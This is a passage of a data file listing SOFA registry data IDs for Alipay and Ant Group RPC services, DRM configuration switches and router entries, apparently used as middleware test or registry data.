SOFA","com.alipay.kbreservationprod.common.service.facade.commonreservation.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.notify.service.facade.NotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.FqpQcQuotationPlateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdarttool.device.detect.DetectRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_investment_daemon.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mychain.baas.common.user.service.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cif.component.GenericSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:multiend@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifinmng.service.facade.ctrl.BizModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0:iguardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbrecruit.common.service.facade.batch.BatchProcessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.167.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa-practice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csshield.service.facade.api.ItemServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.tairLifetime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_portrait_portraitSupportPartnerGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.TaskManageFacade:1.0:BFRXATCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.158.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.betaSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsupport:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apyunqing.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.eventPutOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.biz.service.gateway.mgw.service.VcpVoucherQueryMgwService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:grmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:barrier_checker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.job.UserJobManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.queryShopByPidTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.dividend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_merchant_due_remind@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:insautomarket@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:newAutoAccessProcessCallBack@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.AiSelectProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:diopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantCertificateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiswisdom.feature.common.service.facade.api.feature.FeatureOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.sci.ServiceSciOperCardConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.caprod.service.feedback.facade.CertFeedbackInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthTransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpay.common.service.facade.common.api.BatchInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.antchain.myentcore.common.service.facade.api.EventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.106.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_DATABUS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finauth.core.service.account.FaInstAccountRzoneService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.menu.api.MiniMenuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.account.VcpAssetAccountRelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.225.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.inner.ProductUspFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.InvoiceLotteryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.infosecTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.38.60.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.processdata.api.ProcessDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.acctransquery.common.service.facade.api.PartnerAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:asttshipcoreElasticFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.170.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.withdraw.api.ApplyAsyncContractBacsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.180.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.seekers.facade.maas.MaasFunctionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbtemplate.common.service.facade.manage.PageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.fici.FICIFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceRouterRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.client.fileBridgeQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.65.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:bkcloudfunds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentweb.common.service.facade.content.ContentPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.assetpackage.FaAssetPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igfas.facade.api.FundServiceMatchDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.PointTransHelperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.abilitycore.common.service.facade.adapter.ApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_C_PCCHK_DEDUCT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insthemis.service.facade.workbench.DuplicateIdHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainevent.drm.ComplainInfoDrmResource.extendCommunityRoleInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_LOTHAR4#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.generalconfig.GeneralInstanceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.charge_goldenMysqlReadDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.core.service.guardian.data.OssDataCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductTemplateQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.internal.ArticleQueryInternalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.ordermng_pmc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.ignoreInvokeCallback,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opscloudprod.facade.meta.MetaBizDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instsign.common.service.facade.instbizdata.InstBizDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.common.donate.service.facade.CommonDonateMngDonateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:insurance_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.rate.RateCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.FundCompanyManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.closeDispatchBatch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.xview.core.common.facade.CallbackService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.EWorkCardManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BlackListService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.ModelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitoptrade.api.TradeModelQueryFacade:1.0:tradeModelQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.149.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmarket.content.service.PcreditContentCompletionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcratecenter.service.facade.api.FcClientRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.taskGenerateAlarmNumLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.partner.api.PartnerProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINPROMOBUS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.iot.inspire.IotInspireActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.12.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipsponsorprod.common.service.facade.api.message.LifeMsgSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.opscloud.MrmRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.CreativeActionWhiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkroute.common.service.checkersdk.BizCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.3.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uemprod.biz.service.impl.fundmanage.activitycenter.service.ActivityCenterConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.26.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.api.AssetTransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.biz.dapply.apply.order.DeviceApplyOrderBizService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.trade.service.TradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.common.service.facade.channel.ChannelSettleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.operation.OperationStoreFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LpSystemtimeResource.batchTaskSystemDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@gfbrmp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.merchant.common.service.facade.MccQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antstall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finstore.common.service.facade.fop.bops.OpAdvisorSuggestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_FP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.29.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developerops.biz.devlink.DevLinkManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.security.api.InfosecPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:barcodeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkvoiceprod.facade.subscribe.api.SubscriptionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:reconSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdinningcenter.common.service.facade.api.KdcRpcAdapterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.core.cure.generic.CureTypeRecordQueryComponent:1.0:changecure@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.event.FileBridgeResponseEventHandlerForTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_BATCH_REFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromobus.common.service.facade.thirdparty.WealthInstManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.notify.UserNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ANTPRIVACY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ticket_msg_publisher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-antcello@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_query_myBank_result_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bbcmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.BPProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ipssconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.opsware.api.facade.ops.MachineTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.katongprod.common.service.facade.management.KatongBankInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.finance.eventtree.FinEventTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.oil.AutoMktOilDailyMissionFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.recommendTargetAmountOfWeek,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.product.common.service.api.view.ConfigRuleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.core.service.repository.CommonCategorysRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.module.InsIopPageFacade:1.0:insplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_MOBILE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.176.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchmobile.common.service.facade.mmcard.MrchMemberCardRevisalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.service.model.MdpModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.grayprod.change.drm.ChangePolicy.versioningPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.invoicecommercial.facade.api.TaxOfficeStandardLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.TaskUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers__NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finslip.biz.service.impl.mock.SlipFinalDecisionFacadeMock:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.drm.CommonShareDrm.lockMonitorTimeoutMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.24.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.229.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeexprod.facade.EbppParamAdaptConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.OneTimeTaskServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cstraining.common.service.facade.training.api.CstTrainingManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopDuplicateJudgeExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.facade.ConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custcenter.service.antg.facade.archive.AntArchiveManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ztesla:name=com.alipay.ztesla.abtest.drmconfig.environment.environment,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.kwlib:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:paramcore_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PUBLICTEST#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.blackmirror.ODPSMetaDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INTSERVOPTMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.lottery.LotteryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyProfileQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.242.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test.sub02:1.0@XFIRE@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetswap.common.service.facade.api.ApprovalBridgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.ser